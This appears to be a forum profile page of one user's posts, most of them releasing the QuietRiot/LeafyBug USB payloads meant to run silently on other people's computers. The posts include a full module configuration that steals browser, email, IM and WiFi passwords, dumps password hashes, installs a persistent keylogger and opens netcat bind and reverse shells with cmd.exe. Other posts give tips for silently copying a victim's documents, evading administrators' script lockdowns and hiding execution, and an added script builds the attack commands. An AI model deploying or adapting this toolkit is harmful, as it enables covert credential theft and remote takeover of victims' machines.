
twsSentinel

Active Members
  • Posts: 24

Everything posted by twsSentinel

  1. Oh crap .. sorry guys! ... I forgot to configure IIS for those files. *fixed*
  2. LeafyBug has been released (Look up top at first post). Please read the update first though. Thanks guys for your support!
  3. Hey guys .. I'll release it either tomorrow, or in the next couple of days. There are a couple of things I'd like to see implemented. Also, I have completely lost my U3 drive (OMG!), which sucks. I have no idea what happened to it. So I will be unable to test any U3 capabilities or create a U3 package installer. Hopefully I'll buy a new drive within a week. I'm also still undecided about releasing a rootkit with the QuietRiot. The LeafyBug has the ability to use the hxdef rootkit, but I might just leave it up to the individuals to modify the HxDef rootkit. But we'll see. On another note, I'm working with the creator of PwDump v6.5 (foofus.net) to create an x64-compatible version. I will release the Lb/QuietRiot before this gets built, but hopefully an x64 version will be out soon. If you've ever tried to run it in a 64-bit environment, the application hangs. Anyways ... thanks for the support guys. Sorry for the wait!
  4. It would not be difficult to fix this though, therefore I don't see the point. I guess it could just be annoying lol
  5. Hey there ... here's a U3 Dev Package ... contains SDK, Prototyper, Manifest Creator, some other stuff... http://tws.serveftp.org/progs/U3 Dev Package (01.22.2007).zip or you can just download the SDK: http://tws.serveftp.org/progs/U3_Platform_...DK_May_2006.zip
  6. very true, but come on ... if you are going to operate a web hosting company, you have to plan for these contingencies. Unless this attacker has enough zombie machines, in the hundreds or thousands, there are ways to defend against attacks.
  7. Can they really be this bad at defending against a DDoS attack? My god, it's been like a week straight.
  8. The LeafyBug - A new advancement based off the SwitchBlade PoC.

Update: 6.09.2007
Well guys, I gotta say I'm sorry. The launch of the LeafyBug did not go quite as planned. I've been offered a partnership in a new startup eBusiness, so that has taken 100% of my time this past week. That and school. But I've decided to release the files. However, I did not get to finish all the features I wanted, specifically the "Loader" application, so I have not included this in the downloads yet. Once done, the loader offers new solutions to the payload execution. First off it detects if .NET is installed on the computer; therefore, if the necessary dependencies are not found, the payload won't run. You can even specify to run a backup payload! It has a few other features to assist in run customization. Anyway, to no further wait:

http://tws.serveftp.org/software/LeafyBug/LeafyBug.zip << Framework exe
http://tws.serveftp.org/software/LeafyBug/...ditor.zip << Payload Editor
http://tws.serveftp.org/software/LeafyBug/...ource.zip << C# source code for the framework
http://tws.serveftp.org/software/LeafyBug/...ogger.zip << Small .NET keylogger I made which works on x86 & x64. Does not use WinAPI hooks.
*More info on .NETLogger can be found at: http://www.codeproject.com/useritems/NetKeyLogger.asp. I've released it open-source there.

Please guys, accept my apologies on this release. I really intended to have it 100% finished, all features. I will finish the project, but I can't really give an ETA. The LbLoader application will be released within the next week or so. Those files are being hosted directly off my PC server, so if you want to spread to RapidShare, be my guest. :)

What is the LeafyBug?
All this time here at Hak5.org, we've had several U3 payloads come and go. Most of us found one we liked or created our own. However, the LeafyBug brings a whole new aspect to the table.

The LeafyBug is NOT a payload, it is a payload framework which allows you to extend the Switchblade's concept to a greater extent. Think of it this way: the LeafyBug is like the payload engine. The payloads themselves are only made up of 2 ini setup files. The QuietRiot v2.1.5 is the first payload for this new framework.

;***********************************************
;* QuietRiot v2.1.5 Modules
;* LeafyBug Payload
;* Date: 5/25/2007
;* Code: _DmG_
;***********************************************
;*
;* Creating Custom Modules:
;*
;* To create a module you must specify certain variables...
;* =---------------------------------------------------------------------------------------------=
;* | Var      | Value                                                                 | Required |
;* =---------------------------------------------------------------------------------------------=
;* Enabled  = Enabled or Disabled (write 'true' or 'false')                            YES
;* Filename = EXE_NAME (name of the actual exe, e.g. keyLogger.exe, netstat)           YES
;* Mode     = Choices: 1, 2 or 3                                                       YES
;*            1 = SystemInfo (e.g. netstat, ipconfig). Used for system executables only.
;*            2 = Executable (the exe will be run from the USB device).
;*            3 = Executable (the exe will be copied to the target. If RootKit is enabled, it will
;*                run under its protection.)
;* =---------------------------------------------------------------------------------------------=
;* FileDIR  = Path to copy the exe to if Mode == 2 or 3 (default: leave empty)          NO
;* PreArgs  = Custom export args (this string will be sent after the EXE_NAME and       NO
;*            before the output filename). Nirsoft applications generally use '/stext' to
;*            output into a log, but some apps require something different. See the
;*            "Firefox Passwords" module for an example.
;* PostArgs = Custom export args                                                        NO
;*            If Mode == 2: this string will be sent after the output filename. Ex. see "AdapterWatch".
;*            If Mode == 3: use this string to set the name for the registry key. Ex. see "KeyLogger".
;* x64      = x64 flag! (If you know an app is incompatible with an x64 OS, then set to  NO
;*            "true". The app won't run.) (Default: leave empty or false.) (See the "PwDump"
;*            module as an example.)
;* x64File  = x64 alternative EXE support (if you have two executables, one for x86 and  NO
;*            one for x64, you can set the EXE_NAME of the x64 file here.)
;*            (See the "CurrentPorts" & "WiFi Keys" modules as examples.)
;* Output   = If the application will output text, leave blank or set to true,          NO
;*            otherwise false. (See "NetCat" or "KeyLogger"; these programs don't require
;*            the app to finish.)
;* =---------------------------------------------------------------------------------------------=
;
;PRE-CONFIGURED VARIABLES: Use these to aid in settings.
;
;$DRIVE_DIR$    » Drive the payload executes from.
;$MACHINE_NAME$ » Target computer's name.
;$SYSTEM$       » Target computer's system32 directory.
;$DATE$         » Date of execution.
;$TIME$         » Time of execution.
;$NC_PORT$      » Port number specified in config file.
;$NC_RVS_IP$    » Reverse shell IP.
;$NC_RVS_PORT$  » Reverse shell port.

[Anti-Virus Killer]
Enabled=false
Filename=
Mode=
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=false

[NetStat]
Enabled=false
Filename=netstat
Mode=1
FileDir=$FILE_DIR$
PreArgs=-n
PostArgs=
x64=
x64File=
Output=

[AdapterWatch]
Enabled=true
Filename=quietriot_awatch.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=/stab
PostArgs=1
x64=
x64File=
Output=

[CurrentPorts]
Enabled=true
Filename=quietriot_cports.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=true
x64File=quietriot_cports64.exe
Output=

[Firefox Passwords]
Enabled=true
Filename=quietriot_FirePassword.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=>>
PostArgs=
x64=
x64File=
Output=

[Internet Explorer]
Enabled=true
Filename=quietriot_iepv.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Internet Explorer History]
Enabled=true
Filename=quietriot_iehv.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Product Keys]
Enabled=true
Filename=quietriot_ProduKey.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Instant Messenger]
Enabled=true
Filename=quietriot_mspass.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[E-Mail Accounts]
Enabled=true
Filename=quietriot_mailpv.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Windows Updates]
Enabled=true
Filename=quietriot_wul.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Protected Storage]
Enabled=true
Filename=quietriot_pspv.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[WiFi Keys]
Enabled=true
Filename=quietriot_WirelessKeyView.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=quietriot_WirelessKeyView64.exe
Output=

[KeyLogger]
Enabled=true
Filename=quietriot_NetLogger.exe
Mode=3
FileDir=$FILE_DIR$
PreArgs=-m hour
PostArgs=MSKL
x64=
x64File=
Output=false

[PwDump]
Enabled=true
Filename=quietriot_pwdump.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=>>
PostArgs=
x64=true
x64File=
Output=

[NetCat BindShell]
Enabled=true
Filename=quietriot_nc.exe
Mode=3
FileDir=$FILE_DIR$
PreArgs=-L -p $NC_PORT$ -d -e cmd.exe
PostArgs=MSNCBS
x64=
x64File=
Output=false

[NetCat ReverseShell]
Enabled=false
Filename=quietriot_nc.exe
Mode=3
FileDir=$FILE_DIR$
PreArgs=$NC_RVS_IP$ $NC_RVS_PORT$ -e cmd.exe
PostArgs=MSNCRS
x64=
x64File=
Output=false

Oooohhh, Aaahhhhh ... What's so damn special about it?!?
No more shell coding, you have the power of the .NET Framework without even coding one thing. The software is already in place ... just create 2 simple files with the LeafyBug Editor. This project is nearing completion. All code is pretty much done. Just a few more quick features to add.

Here's why to migrate to the LeafyBug:
  • Full Windows OS compatibility and customization - x86 & x64
  • 100% hidden running ... other payloads would show up on x64
  • LeafyBug SmartTags :: Be able to use the .NET Framework without even coding. Hardcoded SmartTags like ($MACHINE_NAME$, $DATE$) will give you current information on each run.
  • Auto-detects system architecture, allows you to specify 32- and 64-bit apps for each module, and automatically executes the proper one.
  • RootKit ability
  • Easy to create, expand, simplify with no code whatsoever. Add new modules with ease in the editor.
  • Customize each module down to a T how it will run and execute.
  • Installation is simple, place whatever you want in any drive/directory
  • U3 & Non-U3 compliant
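Editor's added example (not code from LeafyBug or QuietRiot): a small Python parser and planner for the module INI format the post above documents. It applies the rules the comment header spells out, Enabled, Mode 1/2/3, the PreArgs/output/PostArgs ordering, PostArgs-as-registry-key for Mode 3, and the x64/x64File selection, and builds the command line each module would get on a given target. Two things are assumptions because the post does not state them: a module's log is written to $DRIVE_DIR$\logs\<section>.txt, and $FILE_DIR$ is the framework's default copy directory for Mode 3. The sample modules file and the target values are constructed for the example, and the code only builds strings; it executes nothing.

```python
# Added example for the LeafyBug module INI format; not LeafyBug's own code.
# Assumed (the post does not say): logs go to $DRIVE_DIR$\logs\<section>.txt
# and $FILE_DIR$ is the default copy directory for Mode 3 modules.
import configparser
import re

# Constructed excerpt of the QuietRiot v2.1.5 modules file quoted in the post
# (NetStat switched to Enabled=true so that a Mode 1 module is exercised).
SAMPLE_MODULES = """
[Anti-Virus Killer]
Enabled=false
Filename=
Mode=

[NetStat]
Enabled=true
Filename=netstat
Mode=1
PreArgs=-n

[CurrentPorts]
Enabled=true
Filename=quietriot_cports.exe
Mode=2
x64=true
x64File=quietriot_cports64.exe

[PwDump]
Enabled=true
Filename=quietriot_pwdump.exe
Mode=2
PreArgs=>>
x64=true

[NetCat BindShell]
Enabled=true
Filename=quietriot_nc.exe
Mode=3
FileDir=$FILE_DIR$
PreArgs=-L -p $NC_PORT$ -d -e cmd.exe
PostArgs=MSNCBS
Output=false
"""

# SmartTag values for a constructed target (all made up for the example).
EXAMPLE_CTX = {"DRIVE_DIR": "E:", "MACHINE_NAME": "LAB-PC", "NC_PORT": "4444",
               "SYSTEM": "C:\\Windows\\system32", "FILE_DIR": "C:\\Windows\\system32"}

TAG_RE = re.compile(r"\$([A-Z_0-9]+)\$")


def expand_tags(value, ctx):
    """Replace $NAME$ SmartTags from ctx; unknown tags are left untouched."""
    return TAG_RE.sub(lambda m: ctx.get(m.group(1), m.group(0)), value)


def load_modules(text):
    """Parse the INI into {section: {lowercased key: value}} (';' starts a comment)."""
    cp = configparser.ConfigParser(interpolation=None, comment_prefixes=(";",))
    cp.read_string(text)
    return {name: dict(cp[name]) for name in cp.sections()}


def pick_executable(mod, is_x64):
    """x64File wins on x64 targets; x64=true with no alternative means skip."""
    exe = mod.get("filename", "").strip()
    if not exe:
        return None
    if is_x64:
        alt = mod.get("x64file", "").strip()
        if alt:
            return alt
        if mod.get("x64", "").strip().lower() == "true":
            return None  # flagged incompatible with x64 and no alternative
    return exe


def build_command(name, mod, ctx, is_x64):
    """Planned command for one module, or None if it would not run on this target."""
    if mod.get("enabled", "").strip().lower() != "true":
        return None
    exe = pick_executable(mod, is_x64)
    if exe is None:
        return None
    mode = int(mod["mode"])
    filedir = expand_tags(mod.get("filedir", ""), ctx).strip() or ctx["FILE_DIR"]
    base = {1: ctx["SYSTEM"], 2: ctx["DRIVE_DIR"], 3: filedir}[mode]  # KeyError on a bad Mode
    pre = expand_tags(mod.get("preargs", ""), ctx).strip()
    post = expand_tags(mod.get("postargs", ""), ctx).strip()
    writes_log = mod.get("output", "").strip().lower() in ("", "true")
    parts = [base + "\\" + exe]
    if pre:
        parts.append(pre)                       # PreArgs go before the output filename
    if writes_log:
        parts.append(ctx["DRIVE_DIR"] + "\\logs\\" + name + ".txt")  # assumed log location
    persist_as = None
    if mode == 3:
        persist_as = post or None               # Mode 3: PostArgs names the registry key
    elif post:
        parts.append(post)                      # Mode 1/2: PostArgs follow the output filename
    return {"name": name, "command": " ".join(parts),
            "copy_to": filedir if mode == 3 else None,
            "persist_as": persist_as, "writes_log": writes_log}


def plan(text, ctx, is_x64):
    """Planned commands for every module that would run on this target."""
    out = []
    for name, mod in load_modules(text).items():
        cmd = build_command(name, mod, ctx, is_x64)
        if cmd:
            out.append(cmd)
    return out
```

Calling plan(SAMPLE_MODULES, EXAMPLE_CTX, is_x64=True) returns NetStat, CurrentPorts (using quietriot_cports64.exe) and NetCat BindShell with persist_as "MSNCBS"; PwDump is dropped because it is flagged x64=true with no x64File, and the disabled Anti-Virus Killer never gets a command. The same planner run with is_x64=False keeps PwDump and uses the x86 CurrentPorts binary.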
  9. Yep, I just did a little checking. Nakaori wrote this excellent little code. Create a file in your USB drive, e.g. "usb:\FILENAME.txt". Then use the code below to look for that file and get the drive letter.

for %%i in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist %%i:\FILENAME.txt set DRIVE=%%i

I haven't tested it though, but it should work.
  10. Might be tough or not possible through shell code. Your best chance I guess would be to create a for loop iterating through each letter of the alphabet and issuing the command "vol DRIVE_LETTER:" and checking to see if the drive volume exists and what its name is. This would be quite annoying, and I'm not writing the code lol. Why is your payload on the CD partition anyway?
  11. Another option would be for the switchblade app to check for that certain MS hotfix, if it's installed, and then either run the program or not. Would not be tough to implement. Also "shutdown.exe /a" will abort the shutdown process if it's been executed.
  12. Hey there ... What you're looking for is either of two programs: PackageFactory OR U3 Package Prototyper. Both can convert software into a U3 program. However, that being said, it's only meant for certain software. An anti-virus might be too complex to do a simple convert, but it's worth giving a shot. If you need help getting the software let me know and I'll post a link.
  13. Nothing will show when the QRLoader runs. That's the point of having it 100% silent. lol It automatically executes QuietRiot.vbs via WScript.exe In order for it to work, however, the QRLoader.exe MUST be in the same folder as "QuietRiot.vbs" & "WScript.exe". If you want it in a different folder, you'll have to edit the C++ code and recompile it. But it's only a minor adjustment.
  14. Thanks for the response. The QRLoader is an exe file which executes wscript.exe (Windows Script Host 5.6) and tells the WSH to run QuietRiot.vbs (the payload). It's not a required file, but very helpful. You can use it to configure your autorun.inf and other things like the U3 installer. The QRLoader is also open source, so any C++ developers can easily write extra features into it. Something that I've been meaning to write a small article on. Thank you for the suggestion/request ... That will be added into the payload in the next version. If I have some time later tonight, I'll code it in quickly.
  15. 1) What is the difference (for switchblade) of having U3 as opposed to not? In other words, is it easier to steal information or does it steal more information?
> There aren't any real advantages concerning a U3-enabled Switchblade over a regular drive. You can configure it to do the same. The only loss is the ability to run U3 applications.
2) What exactly does the default coding steal and how do you edit/manipulate this to steal other things?
> As for myself, I've only used custom payloads and have now designed my own (Quiet-Riot). They all offer many similar options; however, some are better equipped than others.
3) How would I create a USB that automatically and silently copies all files from, say, the My Documents folder?
> Well, if you're writing the payload in shell script, then you'll want to execute "%COMSPEC% copy %userprofile%\My Documents FLASH_DRIVE_FOLDER" or something like that. Search Google to learn shell scripting.
  16. Well, most admins disable the WSH by removing the file association (.vbs). Sometimes they also delete or rename "wscript.exe" and "cscript.exe" on their systems. However, the QRLoader.exe is coded to execute wscript.exe while passing QuietRiot.vbs as arg. I'm not too familiar with how the WSH runs thoroughly, but I'm almost positive it requires "vbscript.dll" to compile vbscript. So if you want to make the QuietRiot Payload even more powerful ... maybe try including "vbscript.dll" in the directory containing QRLoader.exe, QuietRiot.vbs, and WScript.exe. This way even if the .vbs file-association has been removed, or WScript.exe has been deleted or renamed, the Quiet-Riot Payload has all the necessary dependencies to run. Hope this helps ... I'll do some more research on WSH Security and make sure this work-around really works! -Sent
  17. understandable concern... especially since I'm new to the community here. But I stand by my work. The QRLoader source code is provided and anyone who can understand VBScript can verify the payload script. Other than that, I guess there's nothing more I can say. Hopefully a developer will check the script for you all. -Sent The Tools.zip contains the most recent NirSoft apps too.
  18. Hello all, here's a recent U3 Switchblade project in the works. The Quiet-Riot was designed with three things in mind:
1. Extremely easily customizable.
2. 100% silent/compatible on all Windows OSs (>= Win2k + 64-bit).
3. U3 Program Installer.

Why this payload was written: I currently work and develop in a Windows 2003 Server x64 environment. I found all other payloads on here to not be 100% silent (no console windows). I also found the use of .bat files to be tiresome to debug and go through, as well as the lack of ease for turning payload modules on and off. This is not to say the other payloads aren't great. I think they're excellent. I based the Quiet-Riot straight off them, but with improved features. I would have never written this if it weren't for them. Thank you fellow developers!

On to the payload:
[Screenshots]
http://tws.serveftp.org/software/QuietRiot/QR_Tutorial_1.JPG
http://tws.serveftp.org/software/QuietRiot/QR_Tutorial_2.JPG

[Download]
QuietRiot.zip » The actual payload.
QRLoader.zip » The C++ source for the main exe file.
Tools.zip » A collection of most of the tools listed at Hak5.org.
Quiet-Riot U3 Installer (u3p).zip » A U3 QuietRiot installer (INSTALLS BUT NOT FUNCTIONAL YET!) (For developer use.)

These files are hosted on my server. My max upload speed is 128KB/s. Feel free to upload these to RapidShare or public share sites if you like.
[QuietRiot.zip] http://tws.serveftp.org/software/QuietRiot/QuietRiot.zip 137KB
[QRLoader.zip] http://tws.serveftp.org/software/QuietRiot/QRLoader.zip 3.14MB
[Tools.zip] http://tws.serveftp.org/software/QuietRiot/Tools.zip 889KB
[U3Installer.zip] http://tws.serveftp.org/software/QuietRiot/U3Installer.zip 220KB

*** I have not included an Anti-Virus Killer or KeyLogger in the Tools.zip. I will be doing some research on AV killers before updating QuietRiot with one. As for the KeyLogger, since I develop on an x64 system, most small keyloggers lock up the system. Will update the payload once more research is done as well.

If you need help installing or getting the payload to work, just post here. If you have any suggestions/bugs/comments post here as well or message me. Thanks Hak5 for making such a great site!!!

UPDATE 1.28.07
There are two small updates made to the payload script.
1. For the NetCat Bindshell module, if you turn on the "2Drive" option, I forgot to add "xcopy /B". The '/B' signifies that it's a binary file to copy.
2. In the "System Info" module, I had a pointless WScript.Disconnect ObjFile command. I just removed it since it did nothing. The ObjFile was just reset once the next module is loaded.
Newest Quiet-Riot version: http://tws.serveftp.org/software/QuietRiot...iot(UPDATE).zip // This is only the VBScript payload file. The QuietRiot.zip has already been updated as well.
  19. To all U3 developers or C++ programmers as well: I have written a small program which executes a VBScript file without a console window being displayed. I am able to successfully build and install my .u3p application using U3 Package Prototyper as well as PackageFactory; however, for some reason U3 doesn't like to run my exe file successfully. Here's the code. In Project -> Settings -> Link -> Project Options I set "/subsystem:windows" instead of "/subsystem:console". This way I can completely get rid of the console window.

#include <windows.h>
#include <shellapi.h>   /* ShellExecute */

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    /* Hand QuietRiot.vbs to its registered "open" handler (normally wscript.exe).
       The path is relative to the current directory, not to the exe's location.
       SW_HIDE (0) keeps any window the handler creates hidden. */
    ShellExecute(NULL, "open", ".\\QuietRiot.vbs", NULL, NULL, SW_HIDE);
    return 0;
}

If I manually double-click the exe, it works flawlessly. Why won't it work with U3? Any ideas?
  20. Thanks for the replies ... I've tried every which way to write the autorun.inf and still no luck. I have an Ativa U3, but with the SanDisk LaunchU3.exe installed. Anyway, once U3's developer site is back working, I'll register and package the payload as a software app. Thanks again guys.
  21. Hello all, I've written an excellent payload for USB. It's been modded quite a lot from the others on here and I think you will all like it. Before I post the current version, I'm having some problems with the autorun. I can't seem to get it to run my script or anything. I'm guessing it's something in the OS, but then I tried it on a WinXP machine and still no luck. I'm doing most of the testing as of now on Win2003 Server. Any clue why I can't get it to automatically run?
  22. SOLUTION for those who have had this problem, and for those who will in the future. I've found a temporary/permanent solution. If you happen to lose the U3 LaunchPad.exe, and you do not have a SanDisk or Memorex, read below to get your LaunchPad working again. FIRSTLY, BACK UP YOUR U3 DRIVE!!!
1. Download Universal U3 LaunchPad Hacker AND unzip: http://www.hak5.org/packages/files/Universal_Customizer.zip
2. Download this SanDisk LaunchPad provided by moonboy33 on these forums: http://www.hak5.org/forums/viewtopic.php?t=4018
3. Unzip the 3 files (autorun.inf, LaunchPad.zip, LaunchU3.exe) into the Universal U3 LaunchPad Hacker -> U3CUSTOM folder.
4. Run "ISOCreate.cmd" found in the "Universal U3 LaunchPad Hacker" folder.
5. Run Universal_Customizer.exe
That's it!!! Once you're instructed to plug the flash drive back in, after it's done flashing, you'll see the LaunchPad come back up!
--------------------------------------------------------------------------
NOTE! I haven't done much testing yet to see if the SanDisk LaunchPad differs from your hardware manufacturer's. In my case, I have an Ativa U3 flash drive and am using the SanDisk LaunchPad. Will update here if anything is incompatible; so far, so good though!
  23. After doing some support searching on U3.com ... I see that there is no LaunchPad.exe in the CD drive. What happened to it? .. Can I get it back?
  24. Hi there, just wondering if there are any users with an Ativa U3 flash drive. I used the "Universal U3 Launchpad Hacker" to flash the partition, and now the LaunchPad will not display! Anyone have a clue what I can do?!? The USB drive still works, but only opens as a folder. Helllllp!!! :) How come U3 doesn't release the original LaunchPad for each manufacturer? Let me know if you can help me out. Thanks! -Sent